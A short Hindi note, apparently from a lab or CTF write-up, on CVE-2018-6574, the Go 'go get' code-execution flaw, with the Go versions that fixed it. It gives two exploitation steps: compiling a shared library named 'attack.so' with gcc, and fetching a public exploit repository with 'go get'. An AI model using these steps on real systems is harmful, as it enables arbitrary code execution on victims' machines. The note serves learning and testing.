
CVE-2018-6574 यह कमजोरी Golang के go get कमांड को प्रभावित करती है और एक हमलावर को दुर्भावनापूर्ण लाइब्रेरी स्थापित करके सिस्टम पर कोड निष्पादन प्राप्त करने की अनुमति देती है। यह कमजोरी Go 1.8.7, 1.9.4 और 1.10rc2 में ठीक की गई थी। Golang मूल एक्सटेंशन का निर्माण करेगा।
gcc -shared -o attack.so -fPIC attack.c
go get github.com/zerbaliy3v/cve-2018-6574-exploit